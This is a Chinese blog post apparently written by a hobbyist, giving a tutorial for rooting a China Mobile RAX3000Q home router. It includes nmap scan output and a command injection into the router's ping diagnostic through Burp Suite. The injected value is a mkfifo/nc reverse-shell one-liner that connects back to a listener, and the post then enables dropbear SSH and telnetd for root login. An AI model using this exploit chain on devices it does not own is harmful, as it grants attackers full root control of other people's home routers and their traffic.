Kevin8w的小窝

(旧)中移RAX3000Q路由器破解shell教程

 tech/router  833  2 分钟  

前言

参考了imlk大佬的文章进行操作之后,家里的路由器并不能完全实现文章中的操作,尽管版本一样:

一些特征:

  • 没有superadmin和senior用户
  • 公网和内网ip的端口不通(内网只有80,公网不限制)
  • 没有LuCI
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22

C:\Users\Administrator>nmap 192.168.10.1
Starting Nmap 7.91 ( https://nmap.org ) at 2022-12-18 12:00 ?D1ú±ê×?ê±??
Nmap scan report for 192.168.10.1
Host is up (0.0051s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 5.69 seconds

C:\Users\Administrator>nmap -6 2409:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx
Starting Nmap 7.91 ( https://nmap.org ) at 2022-12-18 12:00 ?D1ú±ê×?ê±??
Nmap scan report for 2409:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx
Host is up (0.0036s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
2601/tcp open  zebra
MAC Address: XX:XX:XX:XX:XX:XX (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 13.33 seconds

由于本人家境贫寒移动不给公网,这里使用IPV6地址作为公网IP演示。

破解

需要的工具:

  • BurpSuite
  • nc

获取路由器的IPV6地址

  1. 用路由器背面的账号密码登录网关
  2. 上网设置 -> 更多设置 -> 状态
  3. 把IPV6地址复制下来备用

nc

启动nc:nc -lvnp 4444

打开Burp,设置好代理:

抓包ping: 生成反弹shell:https://www.revshells.com/ 这里我用的是$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.1.98 4444 >/tmp/f) 把反弹shell命令填入url 点击发送就能反弹到我们的PC上。

ssh

1

/usr/sbin/dropbear -p 22

用之前获取的IPV6地址连接ssh

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

C:\Users\Administrator>ssh -6 root@2409:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx
root@2409:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx's password:


BusyBox v1.30.1 () built-in shell (ash)


         CCCCCCCCCCCCC MMMMMMMM               MMMMMMMM DDDDDDDDDDDDD                 CCCCCCCCCCCCC
      CCC::::::::::::C M:::::::M             M:::::::M D::::::::::::DDD           CCC::::::::::::C
    CC:::::::::::::::C M::::::::M           M::::::::M D:::::::::::::::DD       CC:::::::::::::::C
   C:::::CCCCCCCC::::C M:::::::::M         M:::::::::M DDD:::::DDDDD:::::D     C:::::CCCCCCCC::::C
  C:::::C       CCCCCC M::::::::::M       M::::::::::M   D:::::D    D:::::D   C:::::C       CCCCCC
 C:::::C               M:::::::::::M     M:::::::::::M   D:::::D     D:::::D C:::::C
 C:::::C               M:::::::M::::M   M::::M:::::::M   D:::::D     D:::::D C:::::C
 C:::::C               M::::::M M::::M M::::M M::::::M   D:::::D     D:::::D C:::::C
 C:::::C               M::::::M  M::::M::::M  M::::::M   D:::::D     D:::::D C:::::C
 C:::::C               M::::::M   M:::::::M   M::::::M   D:::::D     D:::::D C:::::C
 C:::::C               M::::::M    M:::::M    M::::::M   D:::::D     D:::::D C:::::C
  C:::::C       CCCCCC M::::::M     MMMMM     M::::::M   D:::::D    D:::::D   C:::::C       CCCCCC
   C:::::CCCCCCCC::::C M::::::M               M::::::M DDD:::::DDDDD:::::D     C:::::CCCCCCCC::::C
    CC:::::::::::::::C M::::::M               M::::::M D:::::::::::::::DD       CC:::::::::::::::C
      CCC::::::::::::C M::::::M               M::::::M D::::::::::::DDD           CCC::::::::::::C
         CCCCCCCCCCCCC MMMMMMMM               MMMMMMMM DDDDDDDDDDDDD                 CCCCCCCCCCCCC

 ---------------------------------------------------------------
   For those about to rock... (Chaos Calmer, 0e8bb6b37+r49254)
 ---------------------------------------------------------------
root@OpenWrt:~#

telnet

获取了nc shell之后,执行telnetd即可开启,同样需要用IPV6地址连接。

连接:telnet 2409:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx 23

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

OpenWrt login: root
Password:


BusyBox v1.30.1 () built-in shell (ash)


         CCCCCCCCCCCCC MMMMMMMM               MMMMMMMM DDDDDDDDDDDDD                 CCCCCCCCCCCCC
      CCC::::::::::::C M:::::::M             M:::::::M D::::::::::::DDD           CCC::::::::::::C
    CC:::::::::::::::C M::::::::M           M::::::::M D:::::::::::::::DD       CC:::::::::::::::C
   C:::::CCCCCCCC::::C M:::::::::M         M:::::::::M DDD:::::DDDDD:::::D     C:::::CCCCCCCC::::C
  C:::::C       CCCCCC M::::::::::M       M::::::::::M   D:::::D    D:::::D   C:::::C       CCCCCC
 C:::::C               M:::::::::::M     M:::::::::::M   D:::::D     D:::::D C:::::C
 C:::::C               M:::::::M::::M   M::::M:::::::M   D:::::D     D:::::D C:::::C
 C:::::C               M::::::M M::::M M::::M M::::::M   D:::::D     D:::::D C:::::C
 C:::::C               M::::::M  M::::M::::M  M::::::M   D:::::D     D:::::D C:::::C
 C:::::C               M::::::M   M:::::::M   M::::::M   D:::::D     D:::::D C:::::C
 C:::::C               M::::::M    M:::::M    M::::::M   D:::::D     D:::::D C:::::C
  C:::::C       CCCCCC M::::::M     MMMMM     M::::::M   D:::::D    D:::::D   C:::::C       CCCCCC
   C:::::CCCCCCCC::::C M::::::M               M::::::M DDD:::::DDDDD:::::D     C:::::CCCCCCCC::::C
    CC:::::::::::::::C M::::::M               M::::::M D:::::::::::::::DD       CC:::::::::::::::C
      CCC::::::::::::C M::::::M               M::::::M D::::::::::::DDD           CCC::::::::::::C
         CCCCCCCCCCCCC MMMMMMMM               MMMMMMMM DDDDDDDDDDDDD                 CCCCCCCCCCCCC

 ---------------------------------------------------------------
   For those about to rock... (Chaos Calmer, 0e8bb6b37+r49254)
 ---------------------------------------------------------------
root@OpenWrt:~#
updatedupdated2024-01-282024-01-28

相关文章:

加载评论